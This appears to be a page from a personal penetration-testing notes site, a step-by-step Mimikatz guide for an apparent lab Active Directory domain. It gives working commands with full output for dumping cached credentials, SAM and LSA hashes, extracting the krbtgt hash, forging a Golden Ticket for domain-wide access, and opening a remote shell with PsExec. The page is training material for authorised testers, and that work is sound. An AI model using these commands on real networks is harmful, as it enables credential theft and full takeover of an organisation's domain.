CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Mimikatz - Golden Ticket Attack
  • Mimikatz - Resources
  1. Tools

Mimikatz

  • Once we get Domain Admin we can use mimikatz to dump the creds

  • Launch mimikatz from the target and run privilege::debug (will allow us to debug processes):

    C:\Users\Administrator\Downloads>mimikatz.exe
    
      .#####.   mimikatz 2.2.0 (x86) #19041 Aug 10 2021 17:20:39
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
    
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz #
  • Can be useful on a compromised regular computer sekurlsa::logonpasswords we get NTLM (v1) hash and could try to use pass-the-hash.

    • With wdigest we can see passwords in cleartext (prior to win 7) after only deactivate so possible to reactivate it with mimikats and wait for somebody to log on.

    • Dump the sam lsadump::sam or lsadump::sam /patch

    • Dump lsa (Local Security Authority) lsadump::lsa /patch we get ntlm hashes and try to crack them.

Mimikatz - Golden Ticket Attack

  • With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain

  • lsadump::lsa /inject /name:krbtgt

    mimikatz # lsadump::lsa /inject /name:krbtgt
    Domain : MARVEL / S-1-5-21-1324315119-2624990979-1304259423
    
    RID  : 000001f6 (502)
    User : krbtgt
    
     * Primary
        NTLM : 0afd880b6c9c7207067f0e15dab634a9
        LM   :
      Hash NTLM: 0afd880b6c9c7207067f0e15dab634a9
        ntlm- 0: 0afd880b6c9c7207067f0e15dab634a9
        lm  - 0: 662f5b48c70e0c5211f72eabdcffcfa6
    
     * WDigest
      [STRIPPED]
    
     * Kerberos
        Default Salt : MARVEL.LOCALkrbtgt
        Credentials
          des_cbc_md5       : 074fc873e6c40157
    
     * Kerberos-Newer-Keys
        Default Salt : MARVEL.LOCALkrbtgt
        Default Iterations : 4096
        Credentials
          aes256_hmac       (4096) : e5755cc451bc84fbe6004005f363e0425838d134306ffb0cb3a2f323e02a8ac9
          aes128_hmac       (4096) : a14075bef6022520025c4054880073a2
          des_cbc_md5       (4096) : 074fc873e6c40157
    
     * NTLM-Strong-NTOWF
        Random Value : 97decc0bc95a167ce7ebc2dd728fb83a
  • Take note of:

    • Domain SID: S-1-5-21-1324315119-2624990979-1304259423

    • NTLM Hash of krbtgt: 0afd880b6c9c7207067f0e15dab634a9

  • Pass the ticket: kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt

 mimikatz # kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
User      : AnyDoesNotNeedToExist
Domain    : marvel.local (MARVEL)
SID       : S-1-5-21-1324315119-2624990979-1304259423
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0afd880b6c9c7207067f0e15dab634a9 - rc4_hmac_nt
Lifetime  : 2/12/2022 10:32:39 AM ; 2/10/2032 10:32:39 AM ; 2/10/2032 10:32:39 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'AnyDoesNotNeedToExist @ marvel.local' successfully submitted for current session
  • Get a cmd prmpt using the session and golden ticket misc::cmd

  • We can access to anything on the network:

    C:\Users\Administrator\Downloads>dir \\THEDEFENDER\c$
     Volume in drive \\THEDEFENDER\c$ has no label.
     Volume Serial Number is 22E3-F05A
    
     Directory of \\THEDEFENDER\c$
    
    12/07/2019  01:14 AM    <DIR>          PerfLogs
    01/28/2022  02:29 PM    <DIR>          Program Files
    10/06/2021  05:58 AM    <DIR>          Program Files (x86)
    01/28/2022  04:33 PM    <DIR>          Share
    02/12/2022  05:34 AM    <DIR>          Users
    02/04/2022  01:19 PM    <DIR>          Windows
                   0 File(s)              0 bytes
                   6 Dir(s)  42,889,506,816 bytes free
    
    C:\Users\Administrator\Downloads>
    • We download psexec on our compromised machine

    • We get the shell

      C:\Users\Administrator\Downloads\PSTools>PsExec.exe \\THEDEFENDER cmd.exe
      
      PsExec v2.34 - Execute processes remotely
      Copyright (C) 2001-2021 Mark Russinovich
      Sysinternals - www.sysinternals.com
      
      
      Microsoft Windows [Version 10.0.19044.1288]
      (c) Microsoft Corporation. All rights reserved.
      
      C:\Windows\system32>hostname
      THEDEFENDER

Mimikatz - Resources

PreviousCovenantNextPasswords, Hashes and wordlist tools

Last updated 3 years ago

We can then use to get a shell on a machine from the network

psexec
GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub
Mimikatz
Home · gentilkiwi/mimikatz WikiGitHub
Mimikatz - Wiki
Logo
Logo